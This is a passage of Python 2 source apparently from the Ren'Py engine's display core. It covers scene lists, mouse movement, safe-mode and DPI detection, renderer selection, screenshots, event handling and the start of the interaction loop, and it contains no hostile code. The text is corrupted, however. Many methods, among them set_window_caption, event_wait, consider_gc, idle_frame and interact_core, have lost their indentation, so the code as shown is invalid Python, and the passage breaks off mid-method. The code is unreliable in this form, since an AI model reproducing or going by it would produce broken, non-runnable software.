                    if sle.tag.startswith("hide$"):
                        d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "hide")
                        if not d:
                            continue
                    elif sle.tag.startswith("replaced$"):
                        d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "replaced")
                        if not d:
                            continue
                newl.append(sle)
            self.layers[l] = newl

    def remove_all_hidden(self):
        """Unconditionally drop every hidden/replaced ("$") entry."""
        for l in self.layers:
            newl = [ ]
            for sle in self.layers[l]:
                if sle.tag:
                    if "$" in sle.tag:
                        continue
                newl.append(sle)
            self.layers[l] = newl

    def get_displayable_by_tag(self, layer, tag):
        """Return the displayable with `tag` on `layer`, or None."""
        if layer not in self.layers:
            raise Exception("Unknown layer %r." % layer)
        for sle in self.layers[layer]:
            if sle.tag == tag:
                return sle.displayable
        return None

    def get_displayable_by_name(self, layer, name):
        """Return the displayable with `name` on `layer`, or None."""
        if layer not in self.layers:
            raise Exception("Unknown layer %r." % layer)
        for sle in self.layers[layer]:
            if sle.name == name:
                return sle.displayable
        return None

    def get_image_bounds(self, layer, tag, width, height):
        """
        Return (x, y, w, h) for the image with `tag` on `layer` when
        rendered into a width x height area, or None if it isn't showing.
        """
        if layer not in self.layers:
            raise Exception("Unknown layer %r." % layer)
        for sle in self.layers[layer]:
            if sle.tag == tag:
                break
        else:
            return None
        now = get_time()
        if sle.show_time is not None:
            st = now - sle.show_time
        else:
            st = 0
        if sle.animation_time is not None:
            at = now - sle.animation_time
        else:
            at = 0
        surf = renpy.display.render.render_for_size(sle.displayable, width, height, st, at)
        sw = surf.width
        sh = surf.height
        x, y = place(width, height, sw, sh, sle.displayable.get_placement())
        return (x, y, sw, sh)
def scene_lists(index=-1):
    """Return the scene lists of the context at `index` (the current
    context by default)."""
    context = renpy.game.context(index)
    return context.scene_lists
class MouseMove(object):
    """
    Animates the mouse pointer from its current position to (x, y) over
    `duration` seconds; perform() is called repeatedly to advance it.
    """

    def __init__(self, x, y, duration):
        self.start = get_time()
        self.duration = duration if duration is not None else 0

        self.start_x, self.start_y = renpy.display.draw.get_mouse_pos()

        self.end_x = x
        self.end_y = y

    def perform(self):
        """
        Step the pointer along its path.  Returns True while the move is
        still in progress, False once the endpoint has been reached.
        """
        elapsed = get_time() - self.start

        if elapsed >= self.duration:
            renpy.display.draw.set_mouse_pos(self.end_x, self.end_y)
            return False

        fraction = 1.0 * elapsed / self.duration

        x = int(self.start_x + fraction * (self.end_x - self.start_x))
        y = int(self.start_y + fraction * (self.end_y - self.start_y))

        renpy.display.draw.set_mouse_pos(x, y)
        return True
def get_safe_mode():
    """
    Return True when the game should enter safe mode, requested by
    holding shift at startup.  Only checked once per run (subsequent
    calls return False), and only supported on Windows.
    """
    if renpy.safe_mode_checked:
        return False

    try:
        if renpy.windows:
            import ctypes

            VK_SHIFT = 0x10

            ctypes.windll.user32.GetKeyState.restype = ctypes.c_ushort
            # Bit 15 of GetKeyState is set while the key is held down.
            return bool(ctypes.windll.user32.GetKeyState(VK_SHIFT) & 0x8000)

        # Safe mode doesn't work on other platforms.
        return False

    except:
        # Best-effort: any failure means "no safe mode".
        return False
# The maximum-framerate window (in seconds) requested before the
# Interface object exists; consumed by Interface.__init__.
initial_maximum_framerate = 0.0
class Interface(object):
    def __init__(self):
        """
        Create the Interface singleton: initializes audio and the pygame
        display, and sets up the state shared across interactions.
        """
        # The cached screenshot, as PNG bytes and as a surface.
        self.screenshot = None
        self.screenshot_surface = None
        # The scene at the end of the last interaction, and the
        # transitions pending for the next one, keyed by layer (None for
        # the whole screen).
        self.old_scene = { }
        self.transition = { }
        self.ongoing_transition = { }
        self.transition_time = { }
        self.transition_from = { }
        self.suppress_transition = False
        self.quick_quit = False
        self.force_redraw = False
        self.restart_interaction = False
        # An event peeked but not yet consumed (see event_peek).
        self.pushed_event = None
        self.ticks = 0
        self.mouse = 'default'
        self.timeout_time = None
        self.last_event = None
        self.current_context = None
        self.roll_forward = None
        # Displayables to preload before the next interaction.
        self.preloads = [ ]
        self.frame_time = 0
        self.interact_time = None
        # Time of the last quit request; used to detect a quick repeat.
        self.quit_time = 0
        self.in_quit_event = False
        self.time_event = pygame.event.Event(TIMEEVENT)
        self.redraw_event = pygame.event.Event(REDRAW)
        # Focus state; assumed held until the window says otherwise.
        self.mouse_focused = True
        self.keyboard_focused = True
        self.layer_properties = { }
        self.shown_window = False
        self.fullscreen = False
        self.ignore_touch = False
        self.clear_screenshot = False
        # Derive per-layer placement/clipping properties from the
        # configured clipping rectangles.
        for layer in renpy.config.layers + renpy.config.top_layers:
            if layer in renpy.config.layer_clipping:
                x, y, w, h = renpy.config.layer_clipping[layer]
                self.layer_properties[layer] = dict(
                    xpos=x,
                    xanchor=0,
                    ypos=y,
                    yanchor=0,
                    xmaximum=w,
                    ymaximum=h,
                    xminimum=w,
                    yminimum=h,
                    clipping=True,
                    )
            else:
                self.layer_properties[layer] = dict()
        self.transition_info_stack = [ ]
        self.event_time = 0
        self.mouse_event_time = None
        self.show_mouse = True
        self.display_reset = False
        self.last_resize = None
        # The thread the display belongs to.
        self.thread = threading.current_thread()
        renpy.audio.audio.init()
        try:
            pygame.display.init()
        except:
            # Best-effort: display init may be retried by set_mode.
            pass
        init_time()
        self.mouse_event_time = get_time()
        self.window_caption = None
        renpy.game.interface = self
        renpy.display.interface = self
        self.safe_mode = False
        # Plumbing for taking screenshots from a background thread
        # (see take_screenshot / check_background_screenshot).
        self.bgscreenshot_needed = False
        self.bgscreenshot_event = threading.Event()
        self.bgscreenshot_surface = None
        # The in-progress mouse move animation, if any.
        self.mouse_move = None
        self.text_editing = None
        self.text_rect = None
        self.old_text_rect = None
        self.touch = renpy.exports.variant("touch")
        self.restart_interaction = True
        if renpy.config.periodic_callback:
            renpy.config.periodic_callbacks.append(renpy.config.periodic_callback)
        renpy.display.emulator.init_emulator()
        self.started = False
        self.fullscreen_video = False
        self.safe_mode = get_safe_mode()
        renpy.safe_mode_checked = True
        self.dpi_scale = self.setup_dpi_scaling()
        renpy.display.log.write("DPI scale factor: %f", self.dpi_scale)
        self.maximum_framerate_time = 0.0
        self.maximum_framerate(initial_maximum_framerate)
        # True for the first interact_core of each interaction.
        self.start_interact = True
        # Timestamps of recent frames, for performance measurement.
        self.frame_times = [ ]
        self.frame_duration = 1.0 / 60.0
    def setup_dpi_scaling(self):
        """
        Return the DPI scale factor: the RENPY_HIGHDPI environment
        variable if set, the device DPI / 96 on Windows, and 1.0
        elsewhere or on any error.
        """
        if "RENPY_HIGHDPI" in os.environ:
            return float(os.environ["RENPY_HIGHDPI"])
        if not renpy.windows:
            return 1.0
        try:
            import ctypes
            from ctypes import c_void_p, c_int
            ctypes.windll.user32.SetProcessDPIAware()
            GetDC = ctypes.windll.user32.GetDC
            GetDC.restype = c_void_p
            GetDC.argtypes = [ c_void_p ]
            ReleaseDC = ctypes.windll.user32.ReleaseDC
            ReleaseDC.argtypes = [ c_void_p, c_void_p ]
            GetDeviceCaps = ctypes.windll.gdi32.GetDeviceCaps
            GetDeviceCaps.restype = c_int
            GetDeviceCaps.argtypes = [ c_void_p, c_int ]
            LOGPIXELSX = 88
            dc = GetDC(None)
            # 96 dpi is the Windows baseline, so dpi/96 is the scale.
            rv = GetDeviceCaps(dc, LOGPIXELSX) / 96.0
            ReleaseDC(None, dc)
            # Ignore scales too small to be meaningful.
            if rv < renpy.config.de_minimus_dpi_scale:
                renpy.display.log.write("De minimus DPI scale, was %r", rv)
                rv = 1.0
            return rv
        except:
            renpy.display.log.write("Could not determine DPI scale factor:")
            renpy.display.log.exception()
            return 1.0
    def start(self):
        """
        Start the interface: set the video mode, load fonts, and arm the
        periodic timer.  Runs once; later calls return immediately.
        """
        if self.started:
            return
        # Get a fresh GC baseline before the window comes up.
        gc.collect()
        if gc.garbage:
            gc.garbage[:] = [ ]
        renpy.display.render.render_ready()
        renpy.display.presplash.end()
        renpy.main.log_clock("Interface start")
        self.started = True
        self.set_mode()
        renpy.text.font.load_fonts()
        # Arm the periodic event timer.
        pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)
        pygame.event.set_grab(False)
        # Controllers are skipped in safe mode.
        if not self.safe_mode:
            renpy.display.controller.init()
        s = "Total time until interface ready: {}s".format(time.time() - import_time)
        renpy.display.log.write(s)
        if renpy.android and not renpy.config.log_to_stdout:
            print(s)
    def post_init(self):
        """
        Initialization deferred until the display exists: SDL hints,
        window caption and icon, key repeat, the android wakelock, and
        blocking pygame events we don't use.
        """
        pygame.display.hint("SDL_VIDEO_MINIMIZE_ON_FOCUS_LOSS", "0")
        # Needed for Unity.
        wmclass = renpy.config.save_directory or os.path.basename(sys.argv[0])
        os.environ[b'SDL_VIDEO_X11_WMCLASS'] = wmclass.encode("utf-8")
        self.set_window_caption(force=True)
        self.set_icon()
        if renpy.config.key_repeat is not None:
            delay, repeat_delay = renpy.config.key_repeat
            pygame.key.set_repeat(int(1000 * delay), int(1000 * repeat_delay))
        if android:
            android.wakelock(True)
        # Block events we don't use.
        for i in pygame.event.get_standard_events():
            if i in enabled_events:
                continue
            if i in renpy.config.pygame_events:
                continue
            pygame.event.set_blocked(i)
    def set_icon(self):
        """
        Set the window icon from config.window_icon, centering
        non-square images on a transparent square surface first.
        """
        icon = renpy.config.window_icon
        if icon:
            im = renpy.display.scale.image_load_unscaled(
                renpy.loader.load(icon),
                icon,
                )
            # Pad the image onto a square, centered.  (Integer division
            # is intentional; this is Python 2 code.)
            iw, ih = im.get_size()
            imax = max(iw, ih)
            square_im = renpy.display.pgrender.surface_unscaled((imax, imax), True)
            square_im.blit(im, ( (imax-iw)/2, (imax-ih)/2 ))
            im = square_im
            pygame.display.set_icon(im)
def set_window_caption(self, force=False):
window_title = renpy.config.window_title
if window_title is None:
window_title = "A Ren'Py Game"
caption = renpy.translation.translate_string(window_title) + renpy.store._window_subtitle
if renpy.exports.get_autoreload():
caption += " - autoreload"
if not force and caption == self.window_caption:
return
self.window_caption = caption
pygame.display.set_caption(caption.encode("utf-8"))
    def iconify(self):
        """Minimize (iconify) the game window."""
        pygame.display.iconify()
    def get_draw_constructors(self):
        """
        Instantiate the candidate renderers (draw objects), honoring the
        saved preference, the RENPY_RENDERER environment variable, and
        safe mode, and return them in the order they should be tried.
        """
        renderer = renpy.game.preferences.renderer
        renderer = os.environ.get("RENPY_RENDERER", renderer)
        # Safe mode forces software rendering.
        if self.safe_mode:
            renderer = "sw"
        # ANGLE is Windows-only.
        if (renderer == "angle") and (not renpy.windows):
            renderer = "auto"
        renpy.config.renderer = renderer
        if renderer == "auto":
            if renpy.windows:
                renderers = [ "gl", "angle", "sw" ]
            else:
                renderers = [ "gl", "sw" ]
            if renpy.config.gl2:
                renderers = [ "gl2", "egl2" ] + renderers
        else:
            renderers = [ renderer, "sw" ]
        draw_objects = { }
        def make_draw(name, mod, cls, *args):
            # Instantiate renderer `name` (class `cls` from module `mod`)
            # if it is wanted; log and report failure otherwise.
            if name not in renderers:
                return False
            try:
                __import__(mod)
                module = sys.modules[mod]
                draw_class = getattr(module, cls)
                draw_objects[name] = draw_class(*args)
                return True
            except:
                renpy.display.log.write("Couldn't import {0} renderer:".format(name))
                renpy.display.log.exception()
                return False
        if renpy.windows:
            has_angle = make_draw("angle", "renpy.angle.gldraw", "GLDraw")
        else:
            has_angle = False
        make_draw("gl", "renpy.gl.gldraw", "GLDraw", not has_angle)
        make_draw("gl2", "renpy.gl2.gl2draw", "GL2Draw", "gl2", False)
        make_draw("gles2", "renpy.gl2.gl2draw", "GL2Draw", "gles2", True)
        make_draw("sw", "renpy.display.swdraw", "SWDraw")
        # NOTE(review): "egl2" can appear in renderers but no make_draw
        # call registers it, so append_draw will log it as unknown —
        # confirm whether that renderer is registered elsewhere.
        rv = [ ]
        def append_draw(name):
            if name in draw_objects:
                rv.append(draw_objects[name])
            else:
                renpy.display.log.write("Unknown renderer: {0}".format(name))
        for i in renderers:
            append_draw(i)
        return rv
    def kill_textures(self):
        """Discard textures and cached renders/text layouts, so they can
        be rebuilt (e.g. for a new GL context)."""
        if renpy.display.draw is not None:
            renpy.display.draw.kill_textures()
        renpy.display.render.free_memory()
        renpy.text.text.layout_cache_clear()
    def kill_textures_and_surfaces(self):
        """Discard the textures plus the image cache and buffer-object
        cache backing them."""
        self.kill_textures()
        renpy.display.im.cache.clear()
        renpy.display.module.bo_cache = None
    def set_mode(self, physical_size=None):
        """
        Set the video mode, choosing a draw object (renderer) on the
        first call.  May be called again to recreate the display after a
        reset.  Raises if no renderer can set the mode.
        """
        # A software-rendered movie won't survive the mode change.
        if renpy.display.draw and renpy.display.draw.info["renderer"] == "sw":
            renpy.display.video.movie_stop(clear=False)
        renpy.display.render.free_memory()
        renpy.text.text.layout_cache_clear()
        renpy.display.module.bo_cache = None
        if self.display_reset:
            pygame.key.stop_text_input()
            pygame.key.set_text_input_rect(None)
            self.text_rect = None
            # ANGLE needs a full display quit to recover its context.
            if renpy.display.draw.info["renderer"] == "angle":
                renpy.display.draw.quit()
                pygame.display.quit()
            self.kill_textures_and_surfaces()
        self.old_text_rect = None
        self.display_reset = False
        virtual_size = (renpy.config.screen_width, renpy.config.screen_height)
        if physical_size is None:
            if renpy.mobile or renpy.game.preferences.physical_size is None:
                physical_size = (None, None)
            else:
                physical_size = renpy.game.preferences.physical_size
        # Work out the fullscreen flag, honoring the disable override.
        fullscreen = renpy.game.preferences.fullscreen
        old_fullscreen = self.fullscreen
        self.fullscreen = fullscreen
        if os.environ.get('RENPY_DISABLE_FULLSCREEN', False):
            fullscreen = False
            self.fullscreen = renpy.game.preferences.fullscreen
        if renpy.display.draw:
            # A renderer has already been chosen; reuse it.
            draws = [ renpy.display.draw ]
        else:
            draws = self.get_draw_constructors()
        # Try the renderers in order, keeping the first that succeeds.
        for draw in draws:
            if draw.set_mode(virtual_size, physical_size, fullscreen):
                renpy.display.draw = draw
                renpy.display.render.models = draw.info.get("models", False)
                break
            else:
                pass
        else:
            # No renderer worked; drop fullscreen so the next attempt
            # has a better chance.
            renpy.game.preferences.fullscreen = False
            raise Exception("Could not set video mode.")
        # Save the video size.
        if renpy.config.save_physical_size and not fullscreen and not old_fullscreen:
            renpy.game.preferences.physical_size = renpy.display.draw.get_physical_size()
        if android:
            android.init()
        # We need to redraw the (now blank) screen.
        self.force_redraw = True
        # Assume we have focus until told otherwise.
        self.mouse_focused = True
        self.keyboard_focused = True
        # Assume we're not minimized.
        self.minimized = False
        self.restart_interaction = True
        self.profile_once = False
        # Clear the frame times.
        self.frame_times = [ ]
    def draw_screen(self, root_widget, fullscreen_video, draw):
        """
        Render `root_widget` into a surface tree and, when `draw` is
        true, draw it to the screen, recording the frame time.
        """
        try:
            renpy.display.render.per_frame = True
            renpy.display.screen.per_frame()
        finally:
            renpy.display.render.per_frame = False
        surftree = renpy.display.render.render_screen(
            root_widget,
            renpy.config.screen_width,
            renpy.config.screen_height,
            )
        if draw:
            renpy.display.draw.draw_screen(surftree, fullscreen_video)
            # Record this frame's time, dropping entries older than the
            # configured performance window.
            now = time.time()
            self.frame_times.append(now)
            while (now - self.frame_times[0]) > renpy.config.performance_window:
                self.frame_times.pop(0)
        renpy.display.render.mark_sweep()
        renpy.display.focus.take_focuses()
        self.surftree = surftree
        self.fullscreen_video = fullscreen_video
    def take_screenshot(self, scale, background=False):
        """
        Take a screenshot scaled to `scale`, storing both the surface
        and its PNG bytes on self.  When `background` is true (and not
        on emscripten), the capture is delegated to the display thread
        via the bgscreenshot flag/event pair.
        """
        self.clear_screenshot = False
        # Do nothing before the first interaction.
        if not self.started:
            return
        if background and not renpy.emscripten:
            self.bgscreenshot_event.clear()
            self.bgscreenshot_needed = True
            # Wait for check_background_screenshot on the display thread.
            if not self.bgscreenshot_event.wait(1.0):
                raise Exception("Screenshot timed out.")
            surf = self.bgscreenshot_surface
            self.bgscreenshot_surface = None
        else:
            surf = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
        surf = renpy.display.scale.smoothscale(surf, scale)
        renpy.display.render.mutated_surface(surf)
        self.screenshot_surface = surf
        # Encode to PNG bytes for saving/serialization.
        sio = cStringIO.StringIO()
        renpy.display.module.save_png(surf, sio, 0)
        self.screenshot = sio.getvalue()
        sio.close()
    def check_background_screenshot(self):
        """On the display thread: service a pending background
        screenshot request made by take_screenshot."""
        if self.bgscreenshot_needed:
            self.bgscreenshot_needed = False
            self.bgscreenshot_surface = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
            self.bgscreenshot_event.set()
    def get_screenshot(self):
        """
        Return the PNG bytes of the current screenshot, taking a
        thumbnail-sized one if none is cached.  The cache is discarded
        before returning.
        """
        if not self.started:
            self.start()
        rv = self.screenshot
        if not rv:
            self.take_screenshot(
                (renpy.config.thumbnail_width, renpy.config.thumbnail_height),
                # Delegate to the display thread when called elsewhere.
                background=(threading.current_thread() is not self.thread),
                )
            rv = self.screenshot
        self.lose_screenshot()
        return rv
def lose_screenshot(self):
self.screenshot = None
self.screenshot_surface = None
    def save_screenshot(self, filename):
        """
        Capture the screen (cropped by config.screenshot_crop, if set)
        and write it to `filename`.  Returns True on success, False on
        failure (unless config.debug re-raises).
        """
        window = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
        if renpy.config.screenshot_crop:
            window = window.subsurface(renpy.config.screenshot_crop)
        try:
            renpy.display.scale.image_save_unscaled(window, filename)
            if renpy.emscripten:
                # In the browser, trigger a download of the saved file.
                import emscripten
                emscripten.run_script(r'''FSDownload('%s')''' % filename)
            return True
        except:
            if renpy.config.debug:
                raise
            return False
    def show_window(self):
        """
        Run config.empty_window to show an empty dialogue window when
        appropriate (store._window set, the preference enabled, and no
        window shown yet this interaction).  History is suppressed while
        it runs.
        """
        if not renpy.store._window:
            return
        if not renpy.game.preferences.show_empty_window:
            return
        if renpy.game.context().scene_lists.shown_window:
            return
        if renpy.config.empty_window:
            old_history = renpy.store._history # @UndefinedVariable
            renpy.store._history = False
            PPP("empty window")
            try:
                renpy.config.empty_window()
            finally:
                renpy.store._history = old_history
    def do_with(self, trans, paired, clear=False):
        """
        Run the transition `trans` as its own interaction and return the
        interaction's result.  Returns False immediately when there is
        no transition or transitions are suppressed.
        """
        if renpy.config.with_callback:
            trans = renpy.config.with_callback(trans, paired)
        if (not trans) or self.suppress_transition:
            self.with_none()
            return False
        else:
            self.set_transition(trans)
            return self.interact(trans_pause=True,
                                 suppress_overlay=not renpy.config.overlay_during_with,
                                 mouse='with',
                                 clear=clear)
    def with_none(self, overlay=True):
        """
        Finish the pending statement without a transition: recompute the
        scene (remembering it for non-transitioning layers), clear
        transients, and reset side-image state.
        """
        PPP("start of with none")
        renpy.game.context().say_attributes = None
        # Show the window, if that's necessary.
        self.show_window()
        if overlay:
            self.compute_overlay()
        scene_lists = renpy.game.context().scene_lists
        # Remember the scene for layers without a pending transition.
        for layer, d in self.compute_scene(scene_lists).iteritems():
            if layer not in self.transition:
                self.old_scene[layer] = d
        # Get rid of transient things.
        for i in renpy.config.overlay_layers:
            scene_lists.clear(i)
        scene_lists.replace_transient()
        scene_lists.shown_window = False
        if renpy.store._side_image_attributes_reset:
            renpy.store._side_image_attributes = None
            renpy.store._side_image_attributes_reset = False
def set_transition(self, transition, layer=None, force=False):
if self.suppress_transition and not force:
return
if transition is None:
self.transition.pop(layer, None)
else:
self.transition[layer] = transition
    def event_peek(self):
        """
        Return the next event without consuming it, or None if nothing
        is pending.  The peeked event is kept in self.pushed_event for
        the next poll/wait.
        """
        if self.pushed_event:
            return self.pushed_event
        ev = pygame.event.poll()
        if ev.type == pygame.NOEVENT:
            # Nothing pending: use the gap to service background
            # screenshots and let the draw object sleep a little.
            self.check_background_screenshot()
            renpy.display.draw.event_peek_sleep()
            return None
        self.pushed_event = ev
        return ev
def event_poll(self):
if self.pushed_event:
rv = self.pushed_event
self.pushed_event = None
else:
rv = pygame.event.poll()
self.last_event = rv
return rv
def event_wait(self):
if self.pushed_event:
rv = self.pushed_event
self.pushed_event = None
self.last_event = rv
return rv
self.check_background_screenshot()
ev = pygame.event.wait()
self.last_event = ev
return ev
    def compute_overlay(self):
        """Rebuild the overlay layer by running the overlay functions
        (plus the window overlay functions when a window is shown)."""
        if renpy.store.suppress_overlay:
            return
        # Figure out what the overlay layer should look like.
        renpy.ui.layer("overlay")
        for i in renpy.config.overlay_functions:
            i()
        if renpy.game.context().scene_lists.shown_window:
            for i in renpy.config.window_overlay_functions:
                i()
        renpy.ui.close()
    def compute_scene(self, scene_lists):
        """
        Convert `scene_lists` into a dict mapping each layer name to a
        fixed box holding that layer; the None key maps to a root widget
        combining the ordinary (non-top) layers.
        """
        rv = { }
        for layer in renpy.config.layers + renpy.config.top_layers:
            rv[layer] = scene_lists.make_layer(layer, self.layer_properties[layer])
        root = renpy.display.layout.MultiBox(layout='fixed')
        root.layers = { }
        for layer in renpy.config.layers:
            root.layers[layer] = rv[layer]
            root.add(rv[layer])
        rv[None] = root
        return rv
    def quit_event(self):
        """
        Handle a quit request from the window system by running
        config.quit_action when one exists.  A second request within
        .75 seconds, or one arriving while the first is being handled,
        quits outright (saving for reload).
        """
        if self.screenshot is None:
            renpy.exports.take_screenshot()
        if self.quit_time > (time.time() - .75):
            renpy.exports.quit(save=True)
        if self.in_quit_event:
            renpy.exports.quit(save=True)
        if renpy.config.quit_action is not None:
            self.quit_time = time.time()
            # Make the screen more suitable for interaction.
            renpy.exports.movie_stop(only_fullscreen=True)
            renpy.store.mouse_visible = True
            try:
                self.in_quit_event = True
                renpy.display.behavior.run(renpy.config.quit_action)
            finally:
                self.in_quit_event = False
        else:
            renpy.exports.quit(save=True)
    def get_mouse_info(self):
        """
        Return a (flag, x-offset, y-offset, texture) tuple describing
        the mouse cursor.  Presumably the flag selects the hardware
        cursor and `texture` a software cursor frame from config.mouse —
        TODO confirm against the caller.
        """
        # Decide whether the pointer should be visible at all, honoring
        # the auto-hide timeout and fullscreen video.
        if (renpy.config.mouse_hide_time is not None) and (self.mouse_event_time + renpy.config.mouse_hide_time < renpy.display.core.get_time()):
            visible = False
        else:
            visible = renpy.store.mouse_visible and (not renpy.game.less_mouse)
        visible = visible and self.show_mouse and not (renpy.display.video.fullscreen)
        if not visible:
            return False, 0, 0, None
        # No software cursors configured: just use the hardware cursor.
        if not renpy.config.mouse:
            return True, 0, 0, None
        if not self.mouse_focused:
            return False, 0, 0, None
        # Pick the cursor kind from the focus, falling back to ours.
        mouse_kind = renpy.display.focus.get_mouse() or self.mouse
        if mouse_kind in renpy.config.mouse:
            anim = renpy.config.mouse[mouse_kind]
        else:
            anim = renpy.config.mouse[getattr(renpy.store, 'default_mouse', 'default')]
        # Select this tick's frame of the cursor animation.
        img, x, y = anim[self.ticks % len(anim)]
        rend = renpy.display.im.load_image(img)
        tex = rend.children[0][0]
        xo = rend.children[0][1]
        yo = rend.children[0][2]
        return False, x - xo, y - yo, tex
def set_mouse_pos(self, x, y, duration):
self.mouse_move = MouseMove(x, y, duration)
self.force_redraw = True
def drawn_since(self, seconds_ago):
return (get_time() - self.frame_time) <= seconds_ago
    def check_suspend(self, ev):
        """
        Handle mobile app-lifecycle events, pausing the game while it is
        in the background and quitting on termination.  Returns True
        when `ev` was a suspend event, False otherwise.
        """
        def save():
            # Save for auto-reload, unless we're at the main menu.
            if renpy.config.save_on_mobile_background and (not renpy.store.main_menu):
                renpy.loadsave.save("_reload-1")
            renpy.persistent.update(True)
        if ev.type == pygame.APP_TERMINATING:
            save()
            sys.exit(0)
        if ev.type != pygame.APP_WILLENTERBACKGROUND:
            return False
        # Entering the background: silence audio, stop the timers, save,
        # free memory, and wait for the foreground event.
        renpy.audio.audio.pause_all()
        if android:
            android.wakelock(False)
        pygame.time.set_timer(PERIODIC, 0)
        pygame.time.set_timer(REDRAW, 0)
        pygame.time.set_timer(TIMEEVENT, 0)
        save()
        if renpy.config.quit_on_mobile_background:
            sys.exit(0)
        renpy.exports.free_memory()
        print("Entered background.")
        while True:
            ev = pygame.event.wait()
            if ev.type == pygame.APP_DIDENTERFOREGROUND:
                break
            if ev.type == pygame.APP_TERMINATING:
                sys.exit(0)
        print("Entering foreground.")
        # Since we came back to life, we can get rid of the
        # auto-reload.
        renpy.loadsave.unlink_save("_reload-1")
        pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)
        renpy.audio.audio.unpause_all()
        if android:
            android.wakelock(True)
        # Reset the display so we get the GL context back.
        self.display_reset = True
        self.restart_interaction = True
        return True
def iconified(self):
if self.minimized:
return
self.minimized = True
renpy.display.log.write("The window was minimized.")
    def restored(self):
        """Record that the window has been un-minimized, resetting the
        display on Windows to recover the rendering context."""
        # This is necessary on Windows/DirectX/Angle, as otherwise we get
        # a blank screen.
        if not self.minimized:
            return
        self.minimized = False
        renpy.display.log.write("The window was restored.")
        if renpy.windows:
            self.display_reset = True
            self.set_mode(self.last_resize)
def enter_context(self):
# Stop ongoing transitions.
self.ongoing_transition.clear()
self.transition_from.clear()
self.transition_time.clear()
    def post_time_event(self):
        """Post a TIMEEVENT to the pygame queue; failures (e.g. a full
        queue) are deliberately ignored."""
        try:
            pygame.event.post(self.time_event)
        except:
            pass
    def after_longpress(self):
        """After a long press: ignore further touch events and defocus
        whatever was under the finger."""
        self.ignore_touch = True
        renpy.display.focus.mouse_handler(None, -1, -1, default=False)
def text_event_in_queue(self):
ev = self.event_peek()
if ev is None:
return False
else:
return ev.type in (pygame.TEXTINPUT, pygame.TEXTEDITING)
    def update_text_rect(self):
        """
        Sync the IME / on-screen-keyboard text input rectangle with
        store._text_rect, starting text input when a rectangle appears
        and stopping it when the rectangle goes away.
        """
        if renpy.store._text_rect is not None: # @UndefinedVariable
            self.text_rect = renpy.store._text_rect # @UndefinedVariable
        if self.text_rect is not None:
            not_shown = pygame.key.has_screen_keyboard_support() and not pygame.key.is_screen_keyboard_shown() # @UndefinedVariable
            if self.old_text_rect != self.text_rect:
                # Translate the virtual rectangle to window coordinates.
                x, y, w, h = self.text_rect
                x0, y0 = renpy.display.draw.untranslate_point(x, y)
                x1, y1 = renpy.display.draw.untranslate_point(x + w, y + h)
                rect = (x0, y0, x1 - x0, y1 - y0)
                pygame.key.set_text_input_rect(rect) # @UndefinedVariable
            if not self.old_text_rect or not_shown:
                pygame.key.start_text_input() # @UndefinedVariable
        else:
            if self.old_text_rect:
                pygame.key.stop_text_input() # @UndefinedVariable
                pygame.key.set_text_input_rect(None) # @UndefinedVariable
        self.old_text_rect = self.text_rect
def maximum_framerate(self, t):
if t is None:
self.maximum_framerate_time = 0
else:
self.maximum_framerate_time = max(self.maximum_framerate_time, get_time() + t)
    def interact(self, clear=True, suppress_window=False, trans_pause=False, **kwargs):
        """
        Carry out one interaction, running interact_core until it stops
        asking to repeat, then clean up the transient state.  Returns
        the interaction's result.  Raises if an interaction is already
        in progress in this context.
        """
        renpy.plog(1, "start of new interaction")
        if not self.started:
            self.start()
        if self.clear_screenshot:
            self.lose_screenshot()
        self.clear_screenshot = False
        self.trans_pause = trans_pause
        # Cancel magic error reporting.
        renpy.bootstrap.report_error = None
        context = renpy.game.context()
        if context.interacting:
            raise Exception("Cannot start an interaction in the middle of an interaction, without creating a new context.")
        context.interacting = True
        # Show a missing window.
        if not suppress_window:
            self.show_window()
        # These things can be done once per interaction.
        preloads = self.preloads
        self.preloads = [ ]
        try:
            for i in renpy.config.start_interact_callbacks:
                i()
            repeat = True
            self.start_interact = True
            while repeat:
                repeat, rv = self.interact_core(preloads=preloads, trans_pause=trans_pause, **kwargs)
                self.start_interact = False
            return rv
        finally:
            context.interacting = False
            # Clean out transient stuff at the end of an interaction.
            if clear:
                scene_lists = renpy.game.context().scene_lists
                scene_lists.replace_transient()
            self.ongoing_transition = { }
            self.transition_time = { }
            self.transition_from = { }
            self.restart_interaction = True
            renpy.game.context().mark_seen()
            renpy.game.context().scene_lists.shown_window = False
            if renpy.game.log is not None:
                renpy.game.log.did_interaction = True
            if renpy.store._side_image_attributes_reset:
                renpy.store._side_image_attributes = None
                renpy.store._side_image_attributes_reset = False
def consider_gc(self):
if not renpy.config.manage_gc:
return
count = gc.get_count()
if count[0] >= renpy.config.idle_gc_count:
renpy.plog(2, "before gc")
if count[2] >= renpy.config.gc_thresholds[2]:
gen = 2
elif count[1] >= renpy.config.gc_thresholds[1]:
gen = 1
else:
gen = 0
gc.collect(gen)
if gc.garbage:
renpy.memory.print_garbage(gen)
gc.garbage[:] = [ ]
renpy.plog(2, "after gc")
def idle_frame(self, can_block, expensive):
if expensive:
renpy.plog(1, "start idle_frame (expensive)")
else:
renpy.plog(1, "start idle_frame (inexpensive)")
# We want this to include the GC time, so we don't predict on
start = get_time()
step = 1
while True:
if self.event_peek():
break
if not (can_block and expensive):
if get_time() > (start + .0005):
break
if step == 1:
self.consider_gc()
step += 1
elif step == 2:
renpy.display.draw.ready_one_texture()
step += 1
elif step == 3:
if not self.prediction_coroutine:
step += 1
continue
try:
result = self.prediction_coroutine.send(expensive)
except ValueError:
result = None
if result is None:
self.prediction_coroutine = None
step += 1
elif result is False:
if not expensive:
step += 1
elif step == 4:
if expensive and renpy.emscripten:
renpy.display.im.cache.preload_thread_pass()
step += 1
elif step == 5:
if not self.did_autosave:
renpy.loadsave.autosave()
renpy.persistent.check_update()
self.did_autosave = True
step += 1
else:
break
if expensive:
renpy.plog(1, "end idle_frame (expensive)")
else:
renpy.plog(1, "end idle_frame (inexpensive)")
def interact_core(self,
show_mouse=True,
trans_pause=False,
suppress_overlay=False,
suppress_underlay=False,
mouse='default',
preloads=[],
roll_forward=None,
):
renpy.plog(1, "start interact_core")
suppress_overlay = suppress_overlay or renpy.store.suppress_overlay
self.suppress_overlay = suppress_overlay
self.suppress_underlay = suppress_underlay
self.trans_pause = trans_pause
